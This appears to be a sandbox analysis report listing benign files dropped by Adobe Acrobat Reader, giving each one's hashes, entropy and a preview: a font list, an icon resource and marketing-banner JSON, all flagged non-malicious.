                                                    SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                    SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                    Malicious:false
                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:PostScript document text
                                                    Category:dropped
                                                    Size (bytes):185099
                                                    Entropy (8bit):5.182478651346149
                                                    Encrypted:false
                                                    SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                    MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                    SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                    SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                    SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                    Malicious:false
                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):243196
                                                    Entropy (8bit):3.3450692389394283
                                                    Encrypted:false
                                                    SSDEEP:1536:vKPCPiyzDtrh1cK3XEivK7VK/3AYvYwgqErRo+RQn:yPClJ/3AYvYwghFo+RQn
                                                    MD5:F5567C4FF4AB049B696D3BE0DD72A793
                                                    SHA1:EBEADDE9FF0AF2C201A5F7CC747C9EA61CFA6916
                                                    SHA-256:D8DBFE71873929825A420F73821F3FF0254D51984FAAA82E1B89D31188F77C04
                                                    SHA-512:E769735991E5B1331E259608854D00CDA4F3E92285FDC500158CBD09CBCCEAD8A387F78256A43919B13EBE70C995D19242377C315B0CCBBD4F813251608C1D56
                                                    Malicious:false
                                                    Preview:Adobe Acrobat Reader (64-bit) 23.6.20320....?A12_AV2_Search_18px.............................................................................................................KKK KKK.KKK.KKK.KKK.KKK.KKK@........................................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.............................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.........................KKK.KKK.KKK.KKK0....................KKK.KKK.KKK.KKK`....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK.KKK.....................................KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK.KKK@....................KKK.KKK.KKK.KKK`........................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.KKK.............................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):295
                                                    Entropy (8bit):5.37114742659197
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXF1OWWHHVoZcg1vRcR0YOX6oVeoAvJM3g98kUwPeUkwRe9:YvXKXF15WH2Zc0v76onGMbLUkee9
                                                    MD5:090BF75D95D949EB998129075705EAFC
                                                    SHA1:AE8A497B9F29FF3A4AB6F73DEF3F655F20A6DDE7
                                                    SHA-256:1A4F1C0FDB0E6CF963D0BF391A360171458D73656E302AAF941DA42CF572EEF2
                                                    SHA-512:22E784DA1A73B85BB8026F193D070CB8E1B65BC03089620DA432852FE3838C4B46E55892A147DC99A32AAC59F09349954DE2779F70DCD9DC7259A43B28A37661
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"200702a3-7281-4d96-a37f-f2bf632a5733","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1720296532508,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):294
                                                    Entropy (8bit):5.322400120336073
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXF1OWWHHVoZcg1vRcR0YOX6oVeoAvJfBoTfXpnrPeUkwRe9:YvXKXF15WH2Zc0v76onGWTfXcUkee9
                                                    MD5:8DCE6D97134C979F69B4402457E309DD
                                                    SHA1:88498DB5D1A37397076F99B901BB47C8D6198791
                                                    SHA-256:6892B9E134B2335D28286B8B367A4BE3447A740776C1AEDA261F3B3B09C5C698
                                                    SHA-512:CBF826A7AA77B86E9932266E412AC73FBC8C7C1B913F89C570E9D4FA9558B90A8B1403E561ADDF450105C18F102A94B46EE8B6DD3641BB6391BDC08C24DED068
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"200702a3-7281-4d96-a37f-f2bf632a5733","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1720296532508,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):294
                                                    Entropy (8bit):5.30129097294683
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXF1OWWHHVoZcg1vRcR0YOX6oVeoAvJfBD2G6UpnrPeUkwRe9:YvXKXF15WH2Zc0v76onGR22cUkee9
                                                    MD5:20AF3BAE033F3B66116F372AE143E15A
                                                    SHA1:91C143829022F65D8EF545384A48E191D2CCE77A
                                                    SHA-256:E9E82FF8D2F370ECA75EEAED2E33D5796AABE38DEB1559C59257DBE382D67424
                                                    SHA-512:7B7C7B27B8796C86239D4D30D54DE48986DF99F609F6510A91FF7DF738A628DD64744E4D93E4AAF1FA8046A318725B0EE4A6B041FAA0A3725BBE9D53CAD57FC5
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"200702a3-7281-4d96-a37f-f2bf632a5733","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1720296532508,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):285
                                                    Entropy (8bit):5.358431057007298
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXF1OWWHHVoZcg1vRcR0YOX6oVeoAvJfPmwrPeUkwRe9:YvXKXF15WH2Zc0v76onGH56Ukee9
                                                    MD5:D7B0C416B892C07D39391CB674AB8622
                                                    SHA1:A05C6DD51D368ABD4589575DEDA586BE6BB6E4D8
                                                    SHA-256:3AF51148C15E3BF13489781767009D9FC740B7E7866C432BF1B039103EFC7C15
                                                    SHA-512:4A031B4F92A50ED283993BF841E9768C6ABD613520FDD5AD4CA2CA4525A23D3AA8548D6AAA27EC7F70377527CBD357B13A22F60D1A2EE0D30FA15239AE9B5E1D
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"200702a3-7281-4d96-a37f-f2bf632a5733","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1720296532508,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):292
                                                    Entropy (8bit):5.320410204455033
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXF1OWWHHVoZcg1vRcR0YOX6oVeoAvJfJWCtMdPeUkwRe9:YvXKXF15WH2Zc0v76onGBS8Ukee9
                                                    MD5:06913383AFDA834EF8428E6AF311F655
                                                    SHA1:C2CCD097EE74FFFA10BBE916B1F7FAFC4559A5B8
                                                    SHA-256:F07743864F462DD68C60C55F665C397BB7894F879FA4C414296DDB4EE356C8AA
                                                    SHA-512:953068B985039A75A36440CFB1774717E9BA9AAAA4AF1005E79AFC7C7B7EBA978AED8A2FB731D974F089FACBDBD889BC7FEF307D6661DB7ACD86E4F67AF7B167
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"200702a3-7281-4d96-a37f-f2bf632a5733","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1720296532508,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):289
                                                    Entropy (8bit):5.307854524241971
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXF1OWWHHVoZcg1vRcR0YOX6oVeoAvJf8dPeUkwRe9:YvXKXF15WH2Zc0v76onGU8Ukee9
                                                    MD5:1B80F795612EC013BB4200411EC96817
                                                    SHA1:33FFE2DCEAE2CCB53FA0E913181FE7B3CEDBA85D
                                                    SHA-256:19BBD700184203C45B3EE91B8BC3E5211526B04DC822525873F116AA65119F84
                                                    SHA-512:ACA7B9D129BDC20B25BCA0186BB3039E2AF2478A0BDE108C0FE3680A740CE4287CE3215E0B66B1A265164FA4FE1A891E8743FFB816E630C12023BFFC652B41F3
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"200702a3-7281-4d96-a37f-f2bf632a5733","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1720296532508,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):292
                                                    Entropy (8bit):5.312565058871641
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXF1OWWHHVoZcg1vRcR0YOX6oVeoAvJfQ1rPeUkwRe9:YvXKXF15WH2Zc0v76onGY16Ukee9
                                                    MD5:6DEE937B04E5C7C023E54A1F680E0B4F
                                                    SHA1:B3048DF5A1A30F4CBE5327285B730E195ADB512E
                                                    SHA-256:721084DDAC2C39B3D6E9A6BFA14810AF964AF476FE876E881C52A42575BB2140
                                                    SHA-512:559DFD728035299F3CCE6328887D12C269B211AD5A9C03D895FD3C1C797FE8060960BD4C0521FF7CAE2FC93EC456AF270DDD31B53CECE9C1B77B03792AAED448
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"200702a3-7281-4d96-a37f-f2bf632a5733","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1720296532508,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):289
                                                    Entropy (8bit):5.317106923912867
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXF1OWWHHVoZcg1vRcR0YOX6oVeoAvJfFldPeUkwRe9:YvXKXF15WH2Zc0v76onGz8Ukee9
                                                    MD5:BB0E4A2D52F7311AF580A0E348BF9DDB
                                                    SHA1:E9F3B885B9F89D4990D00D8EFF5C8E0EE69B81FA
                                                    SHA-256:4301625989D14D7C896FC813CF918EE73ACCDAF380B8B407B94E179C7699FCFC
                                                    SHA-512:9579D18B8C435281CF72A7F8A528B00E90AC2BC4694F24813C49FBE895EA6A2AADA61CE38A6A2C6CC5A6BA8DD71D6B29F58E157526BC33B5EB9A658CF94D27A4
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"200702a3-7281-4d96-a37f-f2bf632a5733","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1720296532508,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):1372
                                                    Entropy (8bit):5.738958174977624
                                                    Encrypted:false
                                                    SSDEEP:24:Yv6XP5A2zv7h/KLgENRcbrZbq00iCCBrwJo++ns8ct4mFJNNhY:YvOpBEgigrNt0wSJn+ns8cvFJrhY
                                                    MD5:2011C3986462090F82D27E1D31AFEA70
                                                    SHA1:1EA16A9D2CB72603DCEEADDBFA33E136F3249BFB
                                                    SHA-256:39BE26770D3679C0E9EBB8F7F5C79EC281817F6E36AC7F1BF900E712768DD9E8
                                                    SHA-512:457D96F098EE6E412F9BF0D8CD97261E51B33A40B537EFDC3A60A06E6BD71F2E99BBDD83613E7CFE2D3C0EFCB85C43AE687BF59F7D97EED10630D8D8476F87A6
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"200702a3-7281-4d96-a37f-f2bf632a5733","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1720296532508,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"79887_247329ActionBlock_0","campaignId":79887,"containerId":"1","controlGroupId":"","treatmentId":"acc56846-d570-4500-a26e-7f8cf2b4acad","variationId":"247329"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJUcnkgQWNyb2JhdCBQcm8ifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNSIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTMiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIDctZGF5IHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0byBwcmVtaXVtIFBERiBhbmQgZS1zaWduaW5nIHRvb2xzLiIsImJ
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):289
                                                    Entropy (8bit):5.31369537402822
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXF1OWWHHVoZcg1vRcR0YOX6oVeoAvJfYdPeUkwRe9:YvXKXF15WH2Zc0v76onGg8Ukee9
                                                    MD5:E57400C5B86F366886ACF42108C349CC
                                                    SHA1:F6460F15C3606C3A42FD6E9AAF674AC9239542D7
                                                    SHA-256:5882F5C09BDE23077629D820578DDF40C8F610EA194C2858FB32C1C40805C027
                                                    SHA-512:B76EA9170CE9114798C9AA85FDEF8243312AA374A831AC67EF40DA5FD20254FC8AA47ADEEF05B63A88F574D50408D94E25721A0D861255EB5E5A5C611A0A96A6
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"200702a3-7281-4d96-a37f-f2bf632a5733","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1720296532508,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):1395
                                                    Entropy (8bit):5.77627829216715
                                                    Encrypted:false
                                                    SSDEEP:24:Yv6XP5A2zv7hCrLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJNFhY:YvOpMHgDv3W2aYQfgB5OUupHrQ9FJPhY
                                                    MD5:FB60158B9B758B709225E33D1697C27F
                                                    SHA1:4DFF0934796C170FF1B62916BE9E7D76F8F704F3
                                                    SHA-256:CC6E1A9DC5ECCEB4A10B9B1AF41260765F29451FE91493AF40E3D087361C4349
                                                    SHA-512:9F7DDF9E0D2A6921F9C300F94D1229CFD7EB33F5BC92301F082355C2EAE82F54ED59ECEC2932B03FC04C79FE36C3A2296CD6D1E43826FC45DAE70412468F2995
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"200702a3-7281-4d96-a37f-f2bf632a5733","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1720296532508,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):291
                                                    Entropy (8bit):5.297148345420102
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXF1OWWHHVoZcg1vRcR0YOX6oVeoAvJfbPtdPeUkwRe9:YvXKXF15WH2Zc0v76onGDV8Ukee9
                                                    MD5:D0EA07875ABCBBAAEE5304457826F0AC
                                                    SHA1:8909B4F1CCDD278D1556C25AC931B3CAEBB39323
                                                    SHA-256:EBD6C785F3582B1C7C12B853D83637BB1ACF7EFD3957AF1D7C1703A17293FC91
                                                    SHA-512:E2774C5DFADE2B02AD7A593E23A0755FDB5324FF06807BEA225308E9F6B91F8ADE25ED9E9039E8A89B3636864C248D7B1C99D43B2E5CC6665E1BE18CBE43C148
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"200702a3-7281-4d96-a37f-f2bf632a5733","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1720296532508,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):287
                                                    Entropy (8bit):5.30228522807178
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXF1OWWHHVoZcg1vRcR0YOX6oVeoAvJf21rPeUkwRe9:YvXKXF15WH2Zc0v76onG+16Ukee9
                                                    MD5:9A48F60F0EF1BF60CD82B80FA90AEF1B
                                                    SHA1:10D8D78D7F49E47CBFBFB495E4EE30F5AE9B2279
                                                    SHA-256:9812F67AE134FA48DA85831EDD4A07CAD7A3F73D3E9457402D91D764AE74E647
                                                    SHA-512:B4B482D950B5CB1E51A4B11E8DEABAD736118693D3AF5C6988E7264385D9F8D44AC6F0E4E8DFF22E3EA2FC436F1DF1F59874339705BF3585DDDA7FA7BA729F8F
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"200702a3-7281-4d96-a37f-f2bf632a5733","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1720296532508,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):289
                                                    Entropy (8bit):5.319924479745421
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXF1OWWHHVoZcg1vRcR0YOX6oVeoAvJfbpatdPeUkwRe9:YvXKXF15WH2Zc0v76onGVat8Ukee9
                                                    MD5:EC0CDBF900C897A9F36B51F0F7949B5A
                                                    SHA1:3329704A5F6C16B6D75F5F2362864114DB15DF13
                                                    SHA-256:5DA2D8CD10E538DDA2D001FAB383C93BD12987B9F5E49F3426E635CF28B144BA
                                                    SHA-512:75630FD55E7FCD8B19B246081C91C7221DD88867F910E7FEF35A812BE03DB9B33936D2C64535E68FBC19988D4A0F3648B2B25D672B02068137D89F39CF021D43
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"200702a3-7281-4d96-a37f-f2bf632a5733","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1720296532508,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):286
                                                    Entropy (8bit):5.278082261642974
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXF1OWWHHVoZcg1vRcR0YOX6oVeoAvJfshHHrPeUkwRe9:YvXKXF15WH2Zc0v76onGUUUkee9
                                                    MD5:FA83EDB7AC5B12AA3C7A2ADACA0DCBAE
                                                    SHA1:416A4CCC32AF2E3F535C8FB003A60F3F9DDF5B53
                                                    SHA-256:AE7EA2FC91AC18E2EC16B05B93927C664877028625E948EC20C96D34E1DAAA4A
                                                    SHA-512:4FF331264C53E10E94D348C8309AD20260B67834122A40AC095526D1B9BAEFF8A91A1499A47E1D698915E6B2B620DCD15B905C9DFBC0C5FB1B8DA71DDA630C09
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"200702a3-7281-4d96-a37f-f2bf632a5733","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1720296532508,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):782
                                                    Entropy (8bit):5.3697997674586375
                                                    Encrypted:false
                                                    SSDEEP:12:YvXKXF15WH2Zc0v76onGTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhWBO:Yv6XP5A2zv7hn168CgEXX5kcIfANhmhY
                                                    MD5:DBF2271DC0F9CC6ECBC63DBFC147A2A9
                                                    SHA1:6C614211F7E21FD966776D8C661EEE096C7AB9D0
                                                    SHA-256:495E1FD9ABF9B13D2711086B9EB3C1673B9C40F6DC4BBF6D55E31FB0AD08FC79
                                                    SHA-512:A5C5AC870F1D9D17C1AD3AAA5A108EBBCB97EC77000573C2D05B1E7BB42F8EC5F391795C90105E1C446D2A772A78C9499DE8BCACC1C79E98591CEC244A40C2CA
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"200702a3-7281-4d96-a37f-f2bf632a5733","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1720296532508,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1720119937544}}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):4
                                                    Entropy (8bit):0.8112781244591328
                                                    Encrypted:false
                                                    SSDEEP:3:e:e
                                                    MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                    SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                    SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                    SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                    Malicious:false
                                                    Preview:....
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):2814
                                                    Entropy (8bit):5.132156677772192
                                                    Encrypted:false
                                                    SSDEEP:48:YklI28M9nnhaQN9jTfg9eaemx7vCLlnsYZVBh99BezXUzE:9dn0EPbmnYZPHerJ
                                                    MD5:D2372176016A8380DB647A5B03DA9DF0
                                                    SHA1:AC2F6180FAC7E9D169EEC518D8C0F9DE5D9930C8
                                                    SHA-256:BD742567CF961D270318A52147B1E73C56FE4B0DBE33AF4B2B80F9C92781A029
                                                    SHA-512:AAFEF0AFC09D41976F89D2DD1A97175195ADF2A5B3E6DA619DD563F8C71418D2B001333C20708F0A9F9C3A7985AB3CAC2F703AF376648E29D8BE49E4AD53B8AA
                                                    Malicious:false
